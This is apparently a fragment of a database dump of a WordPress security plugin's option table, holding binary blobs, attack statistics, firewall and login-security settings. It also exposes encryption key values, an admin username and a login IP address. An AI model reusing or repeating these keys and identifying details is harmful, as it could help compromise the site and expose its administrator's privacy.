�SE��9�r=�#_~�\\�/Sͻ�(YC/#/�D��^>�6\\����V�6 E�i�*�X,��/�6������}%]�v�	��\ZY����<�}]�8�c��4=}�X�j(	;��w�g�ָ,\\R�0�$k�o�A��{������2#�am��\'��Y#��O��(&\r\n0�{z����7�j����R�v���^0�?�2Dh�4�SG�8RH�e���4ډ3�z\Zr�K,�Iޗ�Oe�x�џ��i}��.��kQ�_�3��9�y\n�b�-5c,R����3���\'�r��.]9c�x��ߚY9�\\~������f���Ƕh�j}u�pIX�p�ھΩT����/�6�F���k�T�E�;�H	#�ߛ���{�C\'Vۨ/��H_n{��FW��?^ծ�V��� �N	��-���j���s\Zjh߽C�ș�I��E�R���1��G�Ÿċ��d/8��Z{{�S�*Q�b�U�a����9e׽R��X�?楐�1���ih\Z�ҕ��X�T�9�����Eߎ�i��ц	�v���&�=G���V�kr2��C5����m��~q~���;rfXᅸ��eX�t�Ū.+[�����咩H{v���./s|U�Z��A�h$DU�s����I�{\'\01�������r���k��D����a�c���#k�Qbm(��(��{ia^�\\v�J��M��C�`QA6�_�~�j�c�,1��F\n)7��䩾!�@���	�n���K^$��N�Vj���q��`J�BZ�ޅ�J���X�0u�9�>�!��v1����v��ą�>���Ш�&�D�6X]`��=�s\0��1�y5z���4�O�š|p�A5�P���(fy���2��Э�9��ex�kz�B��4��6�Hy�/=��u4�_c���	ο\'���M|4��gE;+\\�)H�q��{�@�dX{a2�H�=���G��6Cm��:�|��!%��p8�Ug𿌫��A�N��y�qoʅ#&]�#mV�ە�rȹ���L�=��6m�zQh��Z������C�� ���T�α���i��ߠPom\\D5~�!�������o��a[�ce�U�>T��ø�~3��$:�З���e���W�_6|�T-�>{�rC\n�=���k��Rd�j��6���T������\'����3H�_cx��N���pn��x{V���@��f!��D.S��J/�xk�nZ�~q��6Lꂨ$����?{II%�&���V(Aw��<䩻���c�$�a�=�����!3C�PY��.c%�0b?O�)Mퟴ����[�%>xd�]?Z�񴝞1����5���q�)��9W/`��kW�V*�_i_\'h�Ma�CQW�~K�0�X~D�<���>�5�O!	U\'���IaӴ9+���6��fF��7�r,��?��O�P��\Z�r�(ga�u;Y�R�>�v\\��?s�k�\\� �~�m���V��|ݐ�\0��!��ٖX6���a�v�/%1U�Ed��_w\'�ޢ���KGs�*<v�u.������S��A`\n�	t���p\'��\\ˑ+&�*u4��c	\Z{\r�������@l(2�u���-V�����Jˀ��z�ا`*#��j�xZ��&�\Z�{C\rB�]���Y�#�<\0!_�M~(�����k��_�M��W��F�i�]������iˍ��B��l@��j�!�\0@�����Ų�3����pv`�r9H��(�c�WޏK\"�$��G�ϭ\'�6�I�\"�V�ɜ=��0������\Z����h݆֭<e1L�!ӳ��\Z��D�K��i��@*S�ĘRg���	r���z�2,o��Q���ϕ�FU���lt��*�g����V☲ù�����۬��Bj�LN��hZ��e%�D\'��G}w���E�k*	��W،j��|���K\'��l�Ȉ<������fdU�Ƭ����\\�fH���v��I�I��w�d�4\"�醗����0_��h�^1���-�c�j�Htfݬ�?���D)�\'��hcF,�4�|i�Ql�p��t�>�%y����1P�bB��R�����[B}�\n[���;	I2q�U�>�n)̈́��Ix��VV$��Z=��q�UO���c����\n���4�\r\'R�2�8�F(>F�2 ����\"Qj6�h��\'�Vh��~��Ad���7��D�c���A�\Z�H�zy�I����Q�]�o��%<��DN�N��M�^�^��/jC9�tb��p�\r<�!!d�e�p��\Z�	�0mz�����%�\ZN���:�J0��L��2��\"L��⯜t�%>��:1��W��R����ͩ��Q�i��~�^G�vr�`G�̃�S������$ �2|��>��Y�wM�W[�� ��I��/�H-j\r%�D��������+�P4�g.���{���^W��/!u����T �&gɖ�\r.��:�)�Q��7�ݣ� �h��\"b�Y(V��W�|/5[�r�ɷ*���M���l���r���n��zW��m:f�O&y(�H������\n�#_F�D:���1I�}U\"\0H�B�&`�8��m��!U�c%rT����.��q�x���=\0���\"�I�8c�_�;�k�6��R�r��E?{d���G_�A���7����c0+��^E��h1��{��9U�,���%k1X�\r Lc�N�;�<K�{�*�k�L������E,�t*�J�.	���*歁\\5��c�%�a��P�T��g�xȻ�=��|@� ԃ��\\��HVq2��v5�o��,�\0�7�IѴ�E�����90.BAe�4>�]y�S�Pk��=�9i��fCu	l6E�#�Zt,#<�\ZL�4Z���FU����!}\\֊��_ȕ��o�/B�\\!�Z<&�^�S���V�?���R�Ê�]��	���ͮ6���R��Ԥz��8�\\4��w��c���y����s���M�)9@����2���.���V�/B��c5a��\rRI�G>?���y;�+�����\'�SAE�D>����qqa�_��؈K)�A��/��YQ��;�#�6�yc�Ȍ�ʗ�j���L�2��-[� 3���]S���.��\\��0ה��B/\n�j�z\'a�����������F�L\Z�H-L	`$p1/>:r���V�Ǚ=={��Or�R�xg�J9G0>z�c&�IÆb4~�*L�Q�Rkg!i��f�nb.*��η���$�gw�T��#;?��`�?��;\"��A�Y|���X;u�a�w?oa���bN$��gI���+���R.�e�\Z����pt��ᣈ��:\Z�`\'8�y`���w�W�0���P��R�Ƈ��]�P�d��$*H��9\n?�g{��gs�	gO��X�I�#n���!F#Yȼv\"|�:�ݯCG#\nY�E[��V�w��i�%�-%F�\0��[�n�1S�a���+���]��B�E2�s�Ŏ)�?ԟ��B�	�*�Z�O��ےn+�z�`ߗ��]�^��$�d�g��Gf���m�G8�@~n��?�	x��*Ցx�k��S��략9�����U�R�ݼ\"�EI� {�`z��$��쨀q���Z6hֲC��R=�8H��ΐ��<���>�y��y�=� �؃��G��ө&����0��*����u�\0u�\r��+M\nMƿ�4��f�_�MG���%2q��0�/ғ:;��e�W�G��ʈ�P��,�K��A]H��%����A��Q�D�۞V蚹xRBBy%�h�Wv��Ƕm�}n�G>p��ѹ��W�����5�w���O�E�̾�m�G��. Ճ�g��?ƒ�r�Тjs$_�D&֗��H��᝭s%��v�x-���#����?	���T���5�)�\\Np�����[��>��&��]����:���.�ѥׇ���4���U���hnl���h��ʫ�jF�**\Z���W�nfrP#3�w֢$����¡桘3���D�\\�[�I�����wD�=O$l\Z�����I��9<��0ox�>��L1��\Z?���f�]��t2Ј���5�����I�v��C�(�߱wzi��C\038�\'U���$�S��(�]4�P�����cU�v�᢭�(�c�̈́ɯ�Tνڐ$_����S����Њ�|��|���n��D��~��v-�;&���W�0��;��7�\"�L~ޅ�LE�`!�)l�ʛ�hL��O�/̩3��z4�Κ�C:Ufz^^Gn����/�pR1�C�̬20�2�J�΍<��:�_��B!s*���l���6���\"Q_�ȹ�2���a7��<\\U}�\"A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}׸d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c��	��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%�؂�!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<���΁�iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[?	PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n޹�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y׊��}˜.��\Z�^�����*�̶=������.�)~��	�_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*�	�&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR����	𪏨�|�z��03��ܸOV1�SlfwV��1	��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F	!������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s��	b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���߼w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?��	C�Q���c2 G������e��h��h��݌^�@�˶\\},n���ۛ~A�F�,���{�<n�н�>!��2��_U�d~��p��7O\";}���r\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1629800730;s:3:\"tdf\";a:3:{s:9:\"community\";i:4203;s:7:\"premium\";i:4410;s:9:\"blacklist\";i:22870;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1629712800;s:1:\"c\";i:17677341;}i:1;a:2:{s:1:\"t\";i:1629716400;s:1:\"c\";i:17509945;}i:2;a:2:{s:1:\"t\";i:1629720000;s:1:\"c\";i:17234184;}i:3;a:2:{s:1:\"t\";i:1629723600;s:1:\"c\";i:17065477;}i:4;a:2:{s:1:\"t\";i:1629727200;s:1:\"c\";i:16762609;}i:5;a:2:{s:1:\"t\";i:1629730800;s:1:\"c\";i:15796532;}i:6;a:2:{s:1:\"t\";i:1629734400;s:1:\"c\";i:12912109;}i:7;a:2:{s:1:\"t\";i:1629738000;s:1:\"c\";i:13338282;}i:8;a:2:{s:1:\"t\";i:1629741600;s:1:\"c\";i:13248978;}i:9;a:2:{s:1:\"t\";i:1629745200;s:1:\"c\";i:13342241;}i:10;a:2:{s:1:\"t\";i:1629748800;s:1:\"c\";i:16020003;}i:11;a:2:{s:1:\"t\";i:1629752400;s:1:\"c\";i:16707243;}i:12;a:2:{s:1:\"t\";i:1629756000;s:1:\"c\";i:16425657;}i:13;a:2:{s:1:\"t\";i:1629759600;s:1:\"c\";i:16225160;}i:14;a:2:{s:1:\"t\";i:1629763200;s:1:\"c\";i:15727107;}i:15;a:2:{s:1:\"t\";i:1629766800;s:1:\"c\";i:15577070;}i:16;a:2:{s:1:\"t\";i:1629770400;s:1:\"c\";i:16025123;}i:17;a:2:{s:1:\"t\";i:1629774000;s:1:\"c\";i:16407640;}i:18;a:2:{s:1:\"t\";i:1629777600;s:1:\"c\";i:20012157;}i:19;a:2:{s:1:\"t\";i:1629781200;s:1:\"c\";i:17900198;}i:20;a:2:{s:1:\"t\";i:1629784800;s:1:\"c\";i:16619182;}i:21;a:2:{s:1:\"t\";i:1629788400;s:1:\"c\";i:18265013;}i:22;a:2:{s:1:\"t\";i:1629792000;s:1:\"c\";i:19644302;}i:23;a:2:{s:1:\"t\";i:1629795600;s:1:\"c\";i:19339819;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:343923168;}i:1;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:279979523;}i:2;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333799530;}i:3;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408254609;}i:4;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385519428;}i:5;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356377333;}i:6;a:2:{s:1:\"t\";i:1629676800;s:1:\"c\";i:376838479;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1627171200;s:1:\"c\";i:320314769;}i:1;a:2:{s:1:\"t\";i:1627257600;s:1:\"c\";i:317209818;}i:2;a:2:{s:1:\"t\";i:1627344000;s:1:\"c\";i:336086739;}i:3;a:2:{s:1:\"t\";i:1627430400;s:1:\"c\";i:332564565;}i:4;a:2:{s:1:\"t\";i:1627516800;s:1:\"c\";i:355470027;}i:5;a:2:{s:1:\"t\";i:1627603200;s:1:\"c\";i:392769100;}i:6;a:2:{s:1:\"t\";i:1627689600;s:1:\"c\";i:382678333;}i:7;a:2:{s:1:\"t\";i:1627776000;s:1:\"c\";i:387475833;}i:8;a:2:{s:1:\"t\";i:1627862400;s:1:\"c\";i:360463030;}i:9;a:2:{s:1:\"t\";i:1627948800;s:1:\"c\";i:341601357;}i:10;a:2:{s:1:\"t\";i:1628035200;s:1:\"c\";i:305263688;}i:11;a:2:{s:1:\"t\";i:1628121600;s:1:\"c\";i:319424049;}i:12;a:2:{s:1:\"t\";i:1628208000;s:1:\"c\";i:433030012;}i:13;a:2:{s:1:\"t\";i:1628294400;s:1:\"c\";i:408782407;}i:14;a:2:{s:1:\"t\";i:1628380800;s:1:\"c\";i:392763415;}i:15;a:2:{s:1:\"t\";i:1628467200;s:1:\"c\";i:395405863;}i:16;a:2:{s:1:\"t\";i:1628553600;s:1:\"c\";i:396082259;}i:17;a:2:{s:1:\"t\";i:1628640000;s:1:\"c\";i:392024539;}i:18;a:2:{s:1:\"t\";i:1628726400;s:1:\"c\";i:399342204;}i:19;a:2:{s:1:\"t\";i:1628812800;s:1:\"c\";i:420208426;}i:20;a:2:{s:1:\"t\";i:1628899200;s:1:\"c\";i:402188678;}i:21;a:2:{s:1:\"t\";i:1628985600;s:1:\"c\";i:340822192;}i:22;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391216026;}i:23;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:343923168;}i:24;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:279979523;}i:25;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333799530;}i:26;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408254609;}i:27;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385519428;}i:28;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356377333;}i:29;a:2:{s:1:\"t\";i:1629676800;s:1:\"c\";i:376838479;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:1189352472;}i:1;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:275901123;}i:2;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:265223293;}i:3;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:226143509;}i:4;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:189601225;}i:5;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:163124072;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:158937187;}i:7;a:2:{s:2:\"cd\";s:2:\"TH\";s:2:\"ct\";i:125828800;}i:8;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:122832205;}i:9;a:2:{s:2:\"cd\";s:2:\"CA\";s:2:\"ct\";i:122231695;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"1e784e3c4b4fcd5a69bcb96177c650a992cbb95f5fecfb2a3d43e493666da0be\";}','no'),('dbVersion','10.5.11-MariaDB-1:10.5.11+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1629719648','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:0:{}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','6e5d26dbaf5e4ac7','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','e5ee69a4db1e318c2a1668873a8f5074012abb9852f5596fe3feaa8c07dac334','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAdminLogin','a:6:{s:6:\"userID\";i:1;s:8:\"username\";s:5:\"admin\";s:9:\"firstName\";s:0:\"\";s:8:\"lastName\";s:0:\"\";s:4:\"time\";s:28:\"Wed 25th August @ 06:15:47AM\";s:2:\"IP\";s:14:\"103.70.171.126\";}','yes'),('lastAttackDataSendId','7013','yes'),('lastAttackDataSendTime','1629614183.142345','yes'),('lastBlockAggregation','1629801257','yes'),('lastBruteForceDataSendTime','0','yes'),('lastDailyCron','1629801256','yes'),('lastDashboardCheck','1629801256','yes'),('lastNotificationID','189','no'),('lastPermissionsTemplateCheck','1629844547','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1629633178','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','c7468a5bf8448c35758c78b21cb238273afc84777b3b60f254566a5ef52575c2','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U�	��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��=	��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�:	X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;؁.v����+�$� i�?�s� �+\n��	؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y	��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r���	|hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq	8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A��	����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X	���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5	�>�	F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`’,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р�	>\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0��	�s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X	v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�࿲0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0�	VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_<	-��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R	�,�	5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L��	�\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k	_�\r?~��ʷ̀�#G@�C�w�C\'�_�	���	�YЉ�[�����*�Z�j}	�B��CE�T�9*�>*�	Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/	t�	UM_U�q��n]]M�B�G�k	��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�׮ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r��	u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(�	����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k	�|��M�Y��^���$6w���h�-���V6k`��E�x|�=غ�lS�4��m�6¶_��R��ė�n�>�~�!<9�v�};\\4�\r��S�o���i�Ӫ_�ӞR���(�y�\rع��B?�]��*��q�	��gN�\r��0�gfn�g��nR`�����b��xN�<�P��=�w�/ج�=`]x��x�>xѹ��W�?x��}x�[��.��|t�}F$����qx\r��0��Px�����C�e�xxY�jxY�+�Oo�U	�����\r��K�a�����g\r���\0^Yp�	ژÁk���\Z��`>޸^=���E������}A�a�p�[���mሳY����p��y1	����#�o�Q3]��8�t�1��1�������l�!���ǂ�������;x[�(x�6�sy\0Ǐ��W-��__��;���hxǑ�pҴhx\'��>��v�#��y��;�8���x_�{T�I����S��q�k��C�7��4[N[��_n��o����[��\r�s78c�6���g�	gf���K:���#�M�>�Q�>z�>f�>�L�yG��pޣ�p����	\"\n>�p>�>��	������,��;§N��]Y��E��\"�H�̰��ٚ��mK��..Yu.�9>�r|��<��.c��S���\rp���!p�m\\u�!|��1�Z�%�&g.|��\r��µ�p�v����-#�62�ck�qk����u��.s����We?�q�<�����m@�>�n�7�o���Ï�V�M�Z�ǧ�Of��ͻ����g5��w���~Q9n=L�/=��W+��W�?�U���H����^�]�-��߫w���6��X���F��;�~)��o�5x*���o��Mg��w�r���\r��ow��w?6�{\Z��=�s�1��ý:���˫�_�#�_�\'�����?^��K��#�_��p��?[<�\0���>�\"@�n�>���7���So#h�}=���D���^q!�D<9\0�ND$�!��/��R��9!����&��MD���u$B��O�#J����a�L�}؊p�o���G_ �sW�ND��Q�G�Dxv\nѲ��hE� Z�m�LD���n_�h\rD�� ���Gt��Ct~5\"�����ŝ��oD��D����G1�{��NF�>�@�!��!�1�����\\w1\n�@�֚\"F}��v����蟦��}bڸ��\'2f�>bVe��K& �^o�]�\"u\'2����[j��������X*G#��g+ub�������	�%Ґ�u}��\\d��aȤc+{{	